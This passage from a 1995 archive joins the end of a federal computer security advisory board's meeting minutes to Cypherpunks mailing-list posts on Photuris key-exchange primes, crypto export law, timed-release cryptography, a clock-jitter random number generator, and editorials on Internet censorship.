sought to do so.  The card implementation is aimed at files
and e-mail, not telephony.  There is initial concern with
regard to cost, however, it is tamper proof and cannot be
distributed over the Internet.  Mr. Walker said they are
seeking export approval with DES and CKE and hopes for a
position resolution in the near future. (See Reference #4.)

The meeting recessed at 5:20 pm.




Thursday, June 8, 1995

SI-PMO Action Plan Briefing

Mr. Al Williams, Acting Director of the Security
Infrastructure Program Management Office (SI-PMO) at GSA,
updated the Board on the activities and progress of the
SI-PMO.  He discussed some of the near term goals: identifying
and resolving critical policy issues related to support
multiple technologies, developing a security architecture,
defining user-to-user and user-to SI specifications, and
establishing a formal liaison between the SI-PMO and the
Canadian Government.  Board members asked about milestones. 
Mr. Williams directed members to the summary of the near-term
actions and milestones in the Action Plan appendix.  When
asked who has received the Action Plan, Mr. Williams replied
that it was distributed to the Government Information
Technology Services Group, the National Information
Infrastructure Security Issues Forum, the Electronic Commerce
Acquisition Program Management Office, the E-Mail Program
Management Office, NSA, NIST, and the PKI Steering Committee.
The Board commended Mr. Williams for working an issue with a
real time frame.  Mr. Williams was invited to come back and
update the Board as he feels appropriate.  (See Reference #5.)


Common Criteria Update

Dr. Stu Katzke, Chief, NIST Computer Security Division,
updated the Board on the Common Criteria (CC) effort.  He
discussed the Common Criteria for Information Technology
Security Evaluation workshop on May 11-12 in Ottawa, Canada. 
Approximately 40 people from Europe, Canada, the U.S., and
Japan participated in the workshop.  The workshop served to
allow the CC Editorial Board to:

-  provide general information on the comments received and
   the planned changes to the document based on these
   comments; and

-  receive added clarifications on the reviewers' comments on
   the document so they can update the document to reflect the
   expert opinions.

The number of assurance levels and where they are were
discussed; however, that issue is not as high on the list as
the six key global issues below:

1. Document Organization - understandability and usefulness;

2. Extensibility of Requirements - support of ITSEC is
   unclear;

3. Extensibility of CC - how to maintain the CC;

4. Protection Profile - relationship unclear;

5. Protection Profile - selection of requirements; and

6. Dependencies and Binding - completeness/correctness.

Dr. Katzke said that the NCSC plans to perform evaluation
trials by January of 1996.  (See Reference #6.)  Mr. Charlie
Baggett volunteered to brief the Board in September  on trial
evaluations.  (ACTION - SECRETARY AND MR. BAGGETT.)

The discussion then turned to the Board's March resolution
(95-2) which recommended to NIST and NSA that a statement be
made regarding the equivalence of C2-level evaluated products. 
Mr. Lou Giles of NSA briefed the Board on NIST and NSA's
response to that recommendation.  In July, NIST and NSA will
publicly clarify the relationship between TCSEC C2, ITS EC E2,
and CTCPEC T1 levels to encourage federal programs with
requirements for evaluated low assurance level products to use
trusted products evaluated at these levels.  NIST and NSA 
will publish a Bulletin in July 1995, which will describe a
structure for the selection and acceptability of these
products.  The Bulletin will include an appendix listing the
products evaluated  and in evaluation under each criteria. 
(See Reference #7.)

Mr. Giles used the phrase "selection preferences for C2
requirements."  Some Board members said that the word
preference takes away from equivalency and they are concerned
that the list of requirements is a preference list rather than
a menu.  Selection preferences for C2 requirement are
as follows:

-  C2 products on U.S. EPL;

-  Products under U.S. TCSEC Evaluation (C2);

-  FPC2/T1 products on Canadian EPL or
   FC2/E2 products on European EPL; and

-  Products under CTCPEC (FPC2/T1) or ITSEC (FC2/E2)
   Evaluation.

Some Board members are concerned that the list suggests that
U.S. products be used first, thereby implying that they are
better than other products.  In discussion, most Board members
recommended they order the products in rank of completed vs
non-completed.

Mr. Giles updated TTAP accomplishments.  To date the work
group has performed the following:

-  Drafted an SOW for TTAP Developmental Commercial Evaluation
   (Feb. 95);

-  Annotated outline for document on what it takes to be
   accredited under NVLAP (Mar. 95);

-  Drafted first suggested evaluator actions for TCSEC Class
   C2 provided to NVLAP for review (Apr. 95);

-  Drafted second suggested evaluator actions for TCSEC Class
   C2 (May 95); and

-  Drafted first Technical Review Board expectations of a team
   (May 95).

Future activities for TTAP include:

-  Contract for TTAP Developmental Commercial Evaluation
   (Jun/Jul 95);

-  Start TTAP Developmental Commercial Evaluation (Aug. 95);

-  Conduct lessons learned from contracted effort (May 96);
   and

-  Expect NVLAP to accredit several Labs (NLT Aug. 96).  (See
   Reference #8.)


Privacy Update [Statement by Mr. Robert Gellman omitted]


Discussion

During discussion time, Board members voted on and unanimously
approved the minutes of the March, 1995 meeting.

The Board engaged in a lengthy discussion concerning PDD-29
and the intent of the charter of the SPB.  Board members
debated the idea of a single policy focal point.  They also
debated the phrase in PDD-29 "National Security."  One Board
member reminded the Board of a Government Computer News
article that PDD-29 appears to be clouded as to whether the
PDD intended to include sensitive unclassified information in
addition to national security (i.e., classified/Warner
Amendment) information.  A motion was moved and seconded
directing the chairman to draft a letter to the Co-Chairs of
the SPB and the SPF, articulating the need for clarification
of PDD-29 and the SPB charter.  (ACTION-CHAIRMAN AND
SECRETARY.)


PKI Steering Committee Activities

Mr. Robert Rosenthal, Manager, NIST Protocol Security Group,
briefed the Board on the activities of the Public Key
Infrastructure (PKI) Steering Committee.  Three working groups
reside under the Committee: technical (chaired by IRS),
business and legal (chaired by Treasury), and users (chaired
by the SI-PMO).  The Steering Committee continues to liaise
with the Canadian and Swedish governments, the Internet
community, the American Bankers and American Bar Associations
and the U. S. Council for International Business.  The
Steering Committee is exploring the establishment of a
Cooperative Research and Development Agreement (CRDA) with
industry organizations to:

-  Research and Develop a PKI Interoperability Test Plan and
   a NIST PKI Test Facility;

-  Publish test procedures and lessons learned; and

-  Develop and Demonstrate Interoperable Certificate Services
   on a wide variety of Internetworked Communications
   Facilities.

Mr. Rosenthal said there are workshops and special projects
slated for the future to include a tri-sponsored PKI
Invitational Workshop Series by NIST, the Security
Infrastructure Program Management Office and MITRE.  Also
planned, are some interdivision projects such as: PKI, time
and attendance, travel, procurement, and others that will be
available on the "NISTNET." NISTNET is a campus-wide local
area network for NIST.  (See Reference #9.)


DISA/ARPA/NSA Memorandum Of Understanding Briefing

Mr. John Davis, Director, NSA's National Computer Security
Center, briefed the Board on the Memorandum Of Understanding
(MOU) between the Defense Information Systems Agency (DISA),
the Advanced Research Projects Agency (ARPA), and the National
Security Agency (NSA).  He said that ARPA and NSA are the
major INFOSEC research programs in government and the major
user of INFOSEC is DISA.  The Information Systems Security
Research Joint Technology Office was established by a
Memorandum Of Agreement (MOA) in March of 1995 and signed by
the Directors of ARPA/DISA/NSA to coordinate security research
efforts with a heavy reliance upon commercial technology.  The
following nine items were called out in the agreement: 1)
Strategic Planning, 2) Review and Coordinate, 3) Evaluate
Proposals, 4) Metrics, 5) Prototypes, 6) COTS, 7) Standards,
8) Crypto and 9) Public.  Mr. Davis said this is work in
progress and they are looking for useful results.  Vendors
will show their products at the NIST/NCSC National Information
Systems Security Conference (NISSC) in Baltimore in
October.  Mr. Davis stated that the intent is not to focus
only on DoD.  A Defense solution would be costly, therefore,
commercial products with built in security are needed.  (See
Reference #10.)


Public Comment [Omitted]













From iagoldbe at calum.csclub.uwaterloo.ca  Wed Nov  8 15:47:54 1995
From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 9 Nov 1995 07:47:54 +0800
Subject: November Bay Area meeting? was: Decemeber SF Bay Area Cyperpunks
In-Reply-To: <199511080549.VAA04978@anemone.corp.sgi.com>
Message-ID: <47qmok$nnk@calum.csclub.uwaterloo.ca>


In article <199511080549.VAA04978 at anemone.corp.sgi.com>,
Katy Kislitzin  <ktk at anemone.corp.sgi.com> wrote:
>Hi--
>
>Eric Messick and I will be holding the Decemeber C'punks meeting at
>our geodesic dome in the Santa Cruz Mountains.  It will be a
>combination meeting and holiday get-together.  It will be happening on
>the usual c'punks saturday, Dec 9, but will start at 4:00 pm instead
>of the usual noon.  A more spirited announcement will follow closer to
>the date.

Speaking of which, did I miss an announcement of the November meeting?
My mail server was down for a few days, so it's entirely possible.
If that's the case, can someone repost it or send it to me?

Thanks,

   - Ian





From bal at martigny.ai.mit.edu  Wed Nov  8 16:09:16 1995
From: bal at martigny.ai.mit.edu (Brian A. LaMacchia)
Date: Thu, 9 Nov 1995 08:09:16 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <199511080143.RAA22564@servo.qualcomm.com>
Message-ID: <9511081704.AA24263@toad.com>


   Date: Tue, 7 Nov 1995 17:43:49 -0800 (PST)
   From: Phil Karn <karn at qualcomm.com>
   Cc: cypherpunks at toad.com, ipsec-dev at eit.COM

   > Our practical experiences with discrete logs suggests that the effort
   > required to perform the discrete log precomputations in (a) is slightly
   > more difficult than factoring a composite of the same size in bits.  In
   > 1990-91 we estimated that performing (a) for a k-bit prime modulus was
   > about as hard as factoring a k+32-bit composite.  [Recent factoring work
   > has probably changed this a bit, but it's still a good estimate.]

   This is also my understanding, which I got from you in the first
   place.  I take it there have been no dramatic breakthroughs in the
   last few years in the discrete log problem? How heavily has it been
   studied in comparison with factoring?

Factoring has received more attention than discrete log; certainly when
it comes to net-wide computations it's all factoring.  But that's partly
due, I think, to a lack of targets to attack.  

   Still, requiring support of a fixed modulus for shared public use is
   important to promote a basic level of interoperability. This has its
   risks, but it should be okay *provided* it's a strong prime of
   sufficient strength to preclude the precomputation of the discrete log
   tables by even a highly motivated and resourceful attacker. And as a
   backup the protocol should provide for the optional use of private
   moduli between consenting parties. Sound reasonable?

You definitely should allow any modulus between consenting parties.  As
for what moduli the standard says "must be" (vs. "should be") supported,
I don't know.  Maybe the right thing to do is require conforming
implementations to support a large modulus but include recommended
smaller moduli.  Then Alice can always force Bob to use the large
modulus but, if both agree, they can use something smaller from the
standard or even their own home-grown modulus.

					--bal





From dreschs at mpd.tandem.com  Wed Nov  8 16:09:21 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Thu, 9 Nov 1995 08:09:21 +0800
Subject: Exporting software doesn't mean exporting
In-Reply-To: <199511080054.QAA29419@email.pdcorp.com>
Message-ID: <199511081517.JAA00972@galil.austnsc.tandem.com.>


Adam Shostack <adam at lighthouse.homeport.org> said:

AS> 	Thus, if the user in Italy has no reason to expect that their
AS> mail to Germany will traverse the US, then I suspect that the US
AS> would have a hard time proving any criminal act.  Doesn't a criminal
AS> act require intent of some type?  If IP routing, in conjunction with
AS> SMTP, beyond the control of the users, ships packets through the US,
AS> I have a hard time believing that that makes those users criminals.

	IANAL, but if they have the intent to transfer cryptographic
software, and can 'reasonably' (wonderful precision there) be expected
to know that there is the potential for portions of the transfer to be
routed through US systems, then I'm guessing that it could be construed
that they had the intent to commit a crime.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3





From perry at piermont.com  Wed Nov  8 16:10:01 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 9 Nov 1995 08:10:01 +0800
Subject: True Random (short c-source)
In-Reply-To: <Pine.SGI.3.91.951108165325.25592A-100000@odin>
Message-ID: <199511081613.LAA00447@jekyll.piermont.com>



What you are doing, basically, is using the processor execution time
loops to measure jitter in the return of the value of clock(). I don't
know how clock() works but I would venture to guess that the jitter in
more predictable than you think.

.pm

Frank Andrew Stevenson writes:
> I have written a short random number generator which appears to produce
> reasonable random numbers even in DOS, at the heart of the code is the
> short function fGetRand, the amount of entropy derived from this
> function varies from >1 to >>6 depending on system load, I haven't
> made any effort to whiten it at all. I am not making any claims about
> its usefulness. I am only trying to demonstrate the ease at which
> good random number may be obtained. Any comments and analysis will be
> mostly welcome, the source is hereby placed in the public domain:
> 
> I have used WATCOM10 to compile and test under DOS/WIN95, where
> clock is running at 18hz. I have also tested on IRIX with impressive
> results.
> 
> --- START ----
> #include <time.h>
> #include <stdio.h>
> 
> int   fGetRand (void);
> 
> main (void) {
>    long vCount;
>    FILE *out;
>    int byte;
>    int tick;
> 
>    out=fopen("random.bin","wb");
>    if(out==NULL) {
>       printf("cant write to file random.bin\n");
>       exit(1);
>    }
> 
>    for(vCount=1;vCount<=512;vCount++) {
>       tick=fGetRand()&0x01;
>       byte=byte+byte+tick;
>       if((vCount & 0x7)==0) fputc((char)byte,out);
>       fputc((char)tick,out);
>    }
> 
>    fclose(out);
> }
> 
> 
> int   fGetRand (void) {
>    int count;
>    clock_t tick;
> 
>    tick=clock();
>    while(tick==clock()) count++;
> 
>    return (count);
> }
> ----- END -----
> 
> PGP encrypted mail preferred, finger for key.
> The above views are ONLY endorsed by BoggleMind Inc. (not to be confused
> with MindBoggle Ltd.)
> 
> 
> 





From droelke at spirit.aud.alcatel.com  Wed Nov  8 16:10:33 1995
From: droelke at spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 9 Nov 1995 08:10:33 +0800
Subject: toolkits?
Message-ID: <9511081640.AA27938@spirit.aud.alcatel.com>




> >
> >Third - provide services to the citizenry.  For example - provide
> >a public key server.  Or how about a digital time-stamping service.
> >If the crap was kept out of these services, and they were free for
> >anyone to use, then it would advance the idea of encouraging people to
> >use crypto in their daily lives.
> >
> 
> Now were getting specific. These are things that us ordinary folk can do
> which show the 'leaders' how to follow. What software, hardware,
> applications, support and sysadmin experience is required and where is it
> available on what terms. What are the cash flow opportunities to support
> such services?

PGP Public key servers - see MIT's key server as a good example.
Digital time-stamping service - see Betsie (sp?) from Bellcore 
as a basis.  These are things that are already out there, BUT 
I think that we can use more services like this.  Comercially
there probably isn't the demand to support these yet, but I think
we have a chicken and the egg problem here.  People can't use
encryption easily if they don't have good access to the tools, 
but people won't demand services like key-servers until they 
start useing the tools.

A good service would be to provide and support distribution of 
of privacy enhancing tools to universities and companies that
want them.  i.e. have people who will help set up firewalls,
PGP, encrypted telnet (pick your flavor), etc. 

A state wide group that has grants to provide internet connectivity
for universities and companies could have a person that does
nothing but work with these companies to help incorporate 
encryption into their networks. For instance, my employeer 
has hardware engineers putting VLSI designs on tape, and then
fed-ex'ing them to the chip manufacturer, because they can't 
get good encryption set up that allows secured ftp transfers.
(and get the manufacturer to agree to the same encryption 
technology, etc. etc. etc.)

Yes - I know that most of this stuff is out there already,
but having people *willing* to integrate it for you without
charging an arm and a leg would go a long way towards convincing the
suits that this is a *good* thing.  

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke at aud.alcatel.com                             Richardson, TX






From perry at piermont.com  Wed Nov  8 16:11:49 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 9 Nov 1995 08:11:49 +0800
Subject: Photuris 512bit Prime Challenge? (Re: Photuris Primality verification needed)
In-Reply-To: <v02130501acc6820ddefd@[204.144.184.50]>
Message-ID: <199511082020.PAA09434@jekyll.piermont.com>



Richard Johnson writes:
> Hilarie Orman <ho at cs.arizona.edu> wrote:
> >If you are willing to accept that in all likelihood, one year from
> >now, some group will announce that can "crack" all key exchanges that
> >using the published modulus, then sure, call it sufficient.
> 
> Sounds like someone just threw down a gauntlet.
> 
> Is it even possible to do the precomputations in a distributed manner in
> less than a year or two?

I would guess that it probably is. However, there is no point in
trying to do this yet since I suspect that Phil and Bill can be
convinced that its a bad idea to specify a 512 bit modulus.

Perry





From Richard.Johnson at Colorado.EDU  Wed Nov  8 16:15:34 1995
From: Richard.Johnson at Colorado.EDU (Richard Johnson)
Date: Thu, 9 Nov 1995 08:15:34 +0800
Subject: Photuris 512bit Prime Challenge? (Re: Photuris Primality verification needed)
Message-ID: <v02130501acc6820ddefd@[204.144.184.50]>


-----BEGIN PGP SIGNED MESSAGE-----

Hilarie Orman <ho at cs.arizona.edu> wrote:

>>  Well, since we already require 56-bit DES in ESP in the interests of
>>  promoting basic interoperability, wouldn't a 512-bit prime be
>>  similarly sufficient?
>
>If you are willing to accept that in all likelihood, one year from
>now, some group will announce that can "crack" all key exchanges that
>using the published modulus, then sure, call it sufficient.

Sounds like someone just threw down a gauntlet.

Is it even possible to do the precomputations in a distributed manner in
less than a year or two?  Or maybe starting a few years down the road?
It would be nice to give Photuris a chance to get established before the
least common denoninator shared modulus gets taken out, if we even can
take it out.


Richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKDVvfobez3wRbTBAQHpkgP9Fg+MGMz8U6Bisv45PZohoZxWbiEYuxJK
tg8oHD8TZRQsuqCwveWFRTnmPGiGKs2cBs5ZKXkFNU6ot7lZLO8d/1BSSjo0yX2Q
0FSXDSaBjUKIFcjHHGYBWrZZ+gjc/bdab94EqQvmFSUmAp73/mnKZgcyUPGL3Cmt
MW3jZhlVMdw=
=bfsQ
-----END PGP SIGNATURE-----







From dsmith at midwest.net  Wed Nov  8 16:19:58 1995
From: dsmith at midwest.net (David E. Smith)
Date: Thu, 9 Nov 1995 08:19:58 +0800
Subject: expiration dates on cryptography
Message-ID: <199511081549.JAA28561@cdale1.midwest.net>


At 07:21 AM 11/8/95 -0500, John Curtis wrote:
>Given that trust is often of an ephemeral nature, it would be
>quite useful to set time limits on secrets.  Would it be possible
>to cryptographically protect a secret such that it could not be
>decrypted after a certain time?
   It's a nice idea, really.  The problem is - how do you verify the
absolute time?  For instance, by resetting a PC's internal clock
you can instantly circumvent that measure.  Possibly by forcing
the application to consult a "reliable" clock like one of the
cesium clocks, but that could be hacked.
   Unless you can absolutely, reliably, and without fear/danger of
being hacked around, verify the correct time, self-destruct crypto
probably won't happen.
----- David E. Smith, dsmith at midwest.net, PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith





From vanhorn at hks.net  Wed Nov  8 16:23:00 1995
From: vanhorn at hks.net (Kevin S. Van Horn)
Date: Thu, 9 Nov 1995 08:23:00 +0800
Subject: DejaNews all over again--a URL for Usenet Searching
Message-ID: <199511082054.PAA07132@bb.hks.net>


-----BEGIN PGP SIGNED MESSAGE-----

tcmay at got.net (Timothy C. May) wrote:
>
>Paul Robichaux pointed me to another searcher, http://www.excite.com/,
>which _does_ index the alt groups. I'm sure more are coming, reaching
>further and further back in time.

A small point of information.  I work for Architext, the company that provides
the excite service.  We only keep the last two weeks of USENET news around,
and don't keep any archives going further back than that.  USENET is just too
damn huge for us to go to the trouble of keeping comprehensive archives around
without good evidence of demand for it among our target audience.

- ------------------------------------------------------------------------------
Kevin S. Van Horn | Uncle Sam needs YOU!
vanhorn at atext.com | But not vice versa.

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMKEY8ioZzwIn1bdtAQFFEgGA1e12AazfexoLEvlrQDWFGPqFOXafAgBZ
NxKKd+nWATgsUQhwI7jQ0P8pTQ9XvI1k
=7sgB
-----END PGP SIGNATURE-----





From jya at pipeline.com  Wed Nov  8 16:23:57 1995
From: jya at pipeline.com (John Young)
Date: Thu, 9 Nov 1995 08:23:57 +0800
Subject: Return of the Cyber-Censors
Message-ID: <199511082002.PAA13786@pipe9.nyc.pipeline.com>


   The Washington Post, November 8, 1995.


   Return of the Cyber-Censors [Editorial]

   When the Senate passed its ill-advised "Exon amendment" to
   the telecommunications bill last spring, which would
   criminalize the transmission of obscene, pornographic or
   "indecent" material on the Internet, the measure got an
   overwhelming 84 votes, many of them from senators who
   didn't understand the implications of the move. Only a few
   weeks later, the House went even more overwhelmingly the
   other way, voting 420 to 4 for an amendment (co-sponsored
   by Reps. Ron Wyden and Christopher Cox) that would bar the
   Federal Communications Commission from regulating
   cyberspace and would instead make it legally easier for
   commercial Internet providers to use their own technical
   tools to regulate questionable material.

   The contrast was the result of a burst of public discussion
   in which more technologically astute members, including
   House Speaker Newt Gingrich, caught on to the disturbing
   fact that the kinds of far-reaching liability imposed by
   Sen. James Exon's formulation -- hastily adapted from an
   existing measure on telephone transmission -- would cripple
   practically any commercial Internet provider and
   effectively lame the new medium as a venue for moneymaking
   activity.

   Now these vastly different measures are in conference
   committee along with the rest of the telecommunications
   bill (in other areas of which, we remind readers once
   again, The Washington Post Co. has some interests). But the
   seeming clarity afforded by the House response to the Exon
   amendment and by Mr. Gingrich's appreciation of the need
   for untrammeled development of the new medium is nowhere to
   be seen. A letter from Christian Coalition head Ralph Reed,
   Phyllis Schlafly and other prominent spokesmen for the
   religious right is urging the conferees toward an
   Exon-style approach that's as destructive now as it ever
   was. The House bill also could end up including an
   amendment sponsored by Rep. Henry Hyde that adds some
   criminal liability to the transmission of obscene (but not
   "indecent") images via the new technologies.

   The argument against "criminalizing" the transmission of
   "indecent" images via the Internet remains stark and
   simple, and it goes not to the awfulness of child
   pornography or even to the ability of parents to control
   what their children do on the computer (a wide variety of
   off-the-shelf technological filters now exist that let
   parents do this themselves) but to the impossibility of
   regulation by the electronic middleman industries that are
   developing.

   Commercial providers such as America Online continue to
   pass along millions of messages a day, the interactive
   "newsgroups" unfold quickly and internationally, and the
   kind of central filtering envisioned by would-be regulators
   erases the very quality that makes the Internet a live and
   promising medium -- its inexpensive accessibility. If the
   Internet were like a telephone system, there would at least
   be the possibility of identifying a specific "sender" and
   "recipient." On the Internet it's "receivers" who do the
   selecting of what to look at and where. Giving those
   recipients the tools they need remains the way to go. The
   conferees should resist the urge to censor cyberspace.














From sunder at amanda.dorsai.org  Wed Nov  8 16:28:22 1995
From: sunder at amanda.dorsai.org (Ray Arachelian)
Date: Thu, 9 Nov 1995 08:28:22 +0800
Subject: Bruce Schneier's Applied Cryptography, 2nd Edition
In-Reply-To: <acbf8a88070210047acb@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951108145313.367A-100000@amanda.dorsai.org>


On Fri, 3 Nov 1995, Timothy C. May wrote:

> At 2:48 PM 11/3/95, Ray Arachelian wrote
> >Now does anyone want my old 1st edition? :-)
> 
> I am interested. I will trade five (5) slightly used prime numbers for it.
> 
> (Has anybody ever thought about using prime numbers as a medium of barter
> in a digital economy? Think of the labor that would be saved if we all
> didn't have to compute our own!! :-})

Sure, why not.  As soon as someone offers something I'd like to get, for 
which they would like the five even more slightly used primes. :-)  But 
seriously, it'll be cool to trade for the book and get something useful 
I'd want anyway...  If not I'll probably chuck it to the public library 
with a post it note that says Anonymous Donation. :-)

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder at dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
===================http://www.dorsai.org/~sunder/=========================






From ylo at cs.hut.fi  Wed Nov  8 16:33:11 1995
From: ylo at cs.hut.fi (Tatu Ylonen)
Date: Thu, 9 Nov 1995 08:33:11 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <199511080146.RAA22568@servo.qualcomm.com>
Message-ID: <199511081833.TAA10801@soikko.cs.hut.fi>


> Well, since we already require 56-bit DES in ESP in the interests of
> promoting basic interoperability, wouldn't a 512-bit prime be
> similarly sufficient?

*NO*, because you have to break the 56-bit DES separately every time,
whereas doing the precomputation for the 512 bit prime is a one-time
job.  Once anyone has done the precomputation, *all* communications
will be open to whoever is in possession of the database.

I think there is good reason to believe that if the 512 bit prime is
allowed, it will be widely used, and even if it is found breakable, it
will not be easily changed (just think about the experience with Sun's
"secure" rpc, and how quickly their primes have been changed - and it
still has much narrower deployment than what is hoped for ipsec).

Let me include below a message I sent to Bill Simpson.  

> If it is kept, the commercial vendors will probably start using it
> as default because it is faster than the others, and the state
> department will pressure them to do so.  Then we are again left with
> too weak aprotections (in other words, pseudo-security which makes
> people believe they have protection, when they actually don't).
> After the precomputation, it is apparently cheap enough to crack the
> exchange that it can be done on a mass scale to all exchanges
> between a very large number of hosts.  I find this very harmful, as
> it again provides no protection against mass surveillance.  We are
> already too close to an Orwellian society.

The remarks there apply equally well to organized criminals, large
corporations, and hostile governments.  Or, suppose some group manages
to get access to enough idle time, computes the database, and posts it
on the Internet.  I for one would be willing to contribute CPU time on
machines where I have access to help such a group, because I think it
is better that it is widely known and publicized when there is little
security and privacy.

Including the provision for the 512 bit prime is *HARMFUL* and
*DANGEROUS*.  Export control is not really an issue here, because if
companies in the United States cannot provide secure networking,
there are other companies in the world that can.

    Tatu Ylonen <ylo at cs.hut.fi>





From nobody at REPLAY.COM  Wed Nov  8 16:38:43 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 9 Nov 1995 08:38:43 +0800
Subject: Cybercensor in Singapore
Message-ID: <199511081715.SAA19894@utopia.hacktic.nl>



NY Times, November 8, 1995, Editorial


Cyberspace in Singapore. The Internet Threat to Official
Censorship

"The Internet is like fire," Mr. Yeo said. "If you don't 
learn how to control it, it will burn you." In Singapore, 
a little democracy can be a dangerous thing.


Singapore. From his 37th-floor office overlooking
Singapore Strait, George Yeo can survey the oil
refineries and bustling dockyards that helped make
Singapore the trade and financial center of Southeast
Asia. But the view that interests the Minister of
Information and the Arts these days is not the vista
beyond his window. It is the image on the computer
terminal at his desk. Mr. Yeo, like the rest of
Singapore's top politicians, wants his country to be a
leader in the manufacture and use of computer technology
without relinquishing the Government's chokehold on the
dissemination of information in Singapore.

Singapore's effort to find a balance point will be
closely watched by other Asian countries that mix
capitalist economics with authoritarian politics. The
difficulty was underlined last week. Even as Mr. Yeo
worried about the perils of the Internet, the Government
announced it was relocating 500 industrial enterprises to
make room for the development of advanced electronics
manufacturing plants.

Contradictions like that abound in Singapore, a country
that eludes simple classification. With its gleaming
skyscrapers and shopping arcades, it can seem like Dallas
transplanted to the South China Sea. Conversely, the
dominance of one political party and the presence of a
paternalistic Government can make it feel like a remnant
of the Soviet bloc. Salman Rushdie's "Satanic Verses" and
Cosmopolitan magazine are banned, yet the city's largest
bookstore stocks a selection of contemporary literature
and the works of Chee Soon Juan, Singapore's opposition
leader.

Singapore's gaudy prosperity challenges the American
faith that individual liberty is essential for a vital
marketplace. George Yeo is the personification of that
challenge. Born in Singapore in 1954, educated at
Cambridge University and Harvard Business School, he is
disdainful of the cacophony and untidiness of American
democracy. Like Lee Kuan Yew, the architect and ruler of
modern Singapore, he believes the vulnerabilities of his
ethnically divcrse city-state can be best handled by a
strong government that encourages a sense of community
and limits individual rights.

But controlling semiconductors is not the same as
controlling newspapers, television networks or political
opponents. With the aggressive use of libel and slander
statutes Singapore's leaders have intimidated the
newspapers that publish here, including The International
Herald Tribune. To control television broadcasting, the
Government has banned household use of satellite dishes.
Some political pluralism is permitted, but no one doubts
the primacy of Mr. Lee's People's Action Party.

Recognizing the risk of bottling up public demand for
foreign television broadcasts, Singapore's leaders are
wiring the country for cable television. That way viewers
will receive many more channels, including MTV, while the
Government will still be able to screen out programming
it finds objectionable. It is the quintessential
Singapore solution.

Singapore's approach to controlling cyberspace is equally
ingenious, but harder to enforce. Mr. Yeo, essentially,
hopes to control the Internet by embracing it. He is
encouraging use of the Internet by equipping schools with
computers, and establishing systems that allow
Singaporeans to link up with the computer network by
dialing a local phone number.

The catch is that the Government will be able to monitor
use of the Internet that goes through local servers, and
is already intervening to block material it considers
pornographic. The Government has blunted an uncensored
Internet forum on Singapore political life by assembling
a group of users who make sure the Government's views are
represented.

Mr. Yeo concedes that more sophisticated and affluent
users can outflank many of his defenses by dialing into
the Internet through foreign phone systems. His purpose,
he says, is to lay down markers for citizens, expecting
that most will abide by them. "The Internet is like
fire," he said. "If you don't learn how to control it, it
will burn you." In Singapore, a little democracy can be
a dangerous thing.

Philip Taubman

-----













From tcmay at got.net  Wed Nov  8 16:42:22 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 08:42:22 +0800
Subject: expiration dates on cryptography
Message-ID: <acc62dde07021004cd59@[205.199.118.202]>


At 12:21 PM 11/8/95, John Curtis wrote:
>The discussion between Mr. May and Mr. Shields concerning
>time-release cryptograhy raised an interesting question in my
>mind.
>
>Given that trust is often of an ephemeral nature, it would be
>quite useful to set time limits on secrets.  Would it be possible
>to cryptographically protect a secret such that it could not be
>decrypted after a certain time?

An interesting twist.

There are two broad things to consider:

1. Cryptography, what can mathematically be done.

2. Economics and social systems, what "business ecologies" can do.

Pure cryptography is about #1, with minimal consideration of #2. Much of
what interests me involves #2.

How this relates to your interesting question goes as follows.

Even the "timed-release cryptography" is NOT a pure cryptographic system,
as the idea of "temporal state" in crypto is iffy. That is, clocks can be
jiggered. Even "sealed clocks" can be jiggered.

But just as Haber and Stornetta's "digital timestamps" use time, such a
thing is possible once _economic agents_ enter the picture. And once
economic considerations are used.

The "timed-release crypto" system depends for its security on the
likelihood that N agents holding pieces of something--something they don't
know the value of--will likely hold those pieces for as long as they are
being paid.

(If you want to discuss why this is likely, even in a world of mistrust and
malice, we can discuss it.)

"Self-destruct crypto" would work roughly the same way:

-- N agents holding pieces of puzzle, contracted to destroy those pieces on
such-and-such date.

It is likely that some or even all of them would comply, if properly paid.

Caveats:

1. Sure, they could make backups. Probably do. But just as archival files
are shredded, a system for eliminating "expired" files would be possible.

2. Sure, they could cheat. Ditto for "timed-release crypto." (Time is
symmetric for this problem.)

3. Again, the security of the system to a large extent depends on the N
agents not knowing what the pieces are part of, nor knowing who the other
holders are. They never know whether a given piece is part of an audit, a
test, etc.

4. There is a slight asymmetry, despite what I said, in that one can "test"
agents to see if they'll release their pieces as contractually obligated
to, but one can never be sure that agents have actually destroyed their
pieces.

5. Still, distributing a secret amongst, say, 30 agents and having them
"agree" to destroy their pieces on January 20, 2002, seems pretty likely to
result in the collective secret (n-out-of-m pieces) being recoverable after
that date.

Such a system would need more consideration of backup strategies, etc. (If
everyone is carefully backing up and the backup tapes are somewhere, then
quite clearly the secret would not be gone; hence the issue of backup
strategies.)


>I suspect that the laws of thermodynamics might prohibit this
>in classical cryptography because as a message expired the
>amount of entropy would decrease.  Quantum cryptography
>might work, but that will be science fiction for some time to
>come.

I'm always interested in the links between information theory, algorithmic
complexity, and notions of entropy, but I am skeptical in the extreme that
the "laws of thermodynamics" have anything to do with whether one can throw
away bits. If I make a list on my computer, and then erase it, have I
violated a "law of thermodynamics"? Of course not.

--Tim May

